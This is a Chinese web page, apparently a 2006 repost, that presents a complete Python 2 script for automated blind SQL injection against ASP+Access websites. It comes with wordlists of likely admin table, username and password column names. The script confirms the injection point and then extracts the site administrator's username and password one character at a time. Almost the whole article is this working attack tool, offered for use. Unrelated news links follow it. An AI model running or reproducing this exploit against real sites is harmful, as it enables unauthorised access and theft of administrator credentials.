分享
 
 
 

Python实现ASP+ACCESS注入,不用SOCKET

王朝asp·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

不用SOCKET是因为个人感觉Python的3个HTTP协议的模块实在是功能太强了.

虽然它们的底层还是通过SOCKET实现的.

三个HTTP模块就是HTTPLIB,URLLIB,URLLIB2

呵呵

CODE

代码:

--------------------------------------------------------------------------------

#!/usr/bin/python

# ASP ACCESS SQL Injection Test

# Written by ToToDoDo (QQ:8924007) Email: osbbs@osbbs.com

from sys import exit

from urllib import urlopen

from string import join,strip

from re import search

def get_tablename():

tablefile = open("table.txt")

for line in tablefile.readlines():

line = strip(line)

sql = join(['%20and%20exists%20(select%20*%20from%20',line,')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",line

else:

print "Found the admin table name:", line,"\n"

print "Now! Start to get name column from",line,"table"

get_namecolumn(line)

print "Now! Start to get password column from",line,"table"

get_passwordcolumn(line)

break

def get_namecolumn(tablename):

namecolumn = open("namecolumn.txt")

for namecolumnline in namecolumn.readlines():

namecolumnline = strip(namecolumnline)

sql = join(['%20and%20exists%20(select%20',namecolumnline,'%20from%20',tablename,')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",namecolumnline

else:

print "Found the name column from admin table:", namecolumnline,"\n"

get_usernamelenth(tablename,namecolumnline)

break

def get_passwordcolumn(tablename):

passwordcolumn = open("passwordcolumn.txt")

for passwordcolumnline in passwordcolumn.readlines():

passwordcolumnline = strip(passwordcolumnline)

sql = join(['%20and%20exists%20(select%20',passwordcolumnline,'%20from%20',tablename,')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",passwordcolumnline

else:

print "Found the password column from admin table:", passwordcolumnline,"\n"

get_passwordlenth(tablename,passwordcolumnline)

break

def get_usernamelenth(tablename,namecolumn):

for x in range(1,51):

sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',namecolumn,')=',str(x),')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",x

else:

print "Found the lenth of the username:", x,"\n"

get_username(tablename,namecolumn,x)

break

def get_passwordlenth(tablename,passwordcolumn):

for x in range(1,51):

sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',passwordcolumn,')=',str(x),')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",x

else:

print "Found the lenth of the password:", x,"\n"

get_password(tablename,passwordcolumn,x)

break

def get_username(tablename,namecolumn,lenth):

list = []

for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:

list.extend(x)

global username

username = ''

for y in range(1,lenth+1):

print "Now! Crack the left ",y," of the username","Waiting~~~~~~~"

for z in list:

sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",namecolumn,",",str(y),",","1))=",str(z),")"],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if search(judge,htmlcodes):

username = join([username,chr(z)],'')

break

print "Found the username = :",username,"\n"

def get_password(tablename,passwordcolumn,lenth):

list = []

for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:

list.extend(x)

global password

password = ''

for y in range(1,lenth+1):

print "Now! Crack the left ",y," of the password","Waiting~~~~~~~"

for z in list:

sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",passwordcolumn,",",str(y),",","1))=",str(z),")"],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if search(judge,htmlcodes):

password = join([password,chr(z)],'')

break

print "Found the password = :",password,"\n"

print "\n########################################################################\n"

print " ASP+ACCESS SQL Injection Scripts By ToToDoDo with Python 2.3.x(QQ:8924007)"

print " Email: osbbs@msn.com\n"

print "========================================================================";

print """Usage:

C:\Python23>python asp_inject.py

Supply a URL to test inject = http://127.0.0.1/article/list.asp?id=3

Supply some string in correct page but not in error page to help this script to

judge properly.

Judge string = test\n"""

print "########################################################################\n";

url = raw_input('Supply a URL to test inject = ')

if url == '':

print "U must supply a URL with '.asp?xxx=' in"

exit(1)

judge = raw_input("\nSupply some string in correct page but not in error page to help this script to judge properly.\n\nJudge string = ")

if judge == '':

print "U must supply a string to help judge!"

exit(1)

a = '%20and%201=1'

b = '%20and%201=2'

urlfile_a = urlopen(url+a)

urlfile_b = urlopen(url+b)

htmlcodes_a = urlfile_a.read()

htmlcodes_b = urlfile_b.read()

if search(judge,htmlcodes_a) and not search(judge,htmlcodes_b):

print "\n\n\nFound injection:",url,"\n\n\nNow,start to get the table name!","\n"

get_tablename()

print "\n\n\nThe admin's account name is ",username,"\nThe admin's password is ",password

else:

print "Can't be Injected"

--------------------------------------------------------------------------------

需要3个字典文件:

table.txt:

user

userinfo

admintable

admin

article_admin

namecolumn.txt:

name

username

u_name

uname

adminname

passwordcolumn.txt

pass

adminpass

pwd

password

passwd

admin_pass

admin_password

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有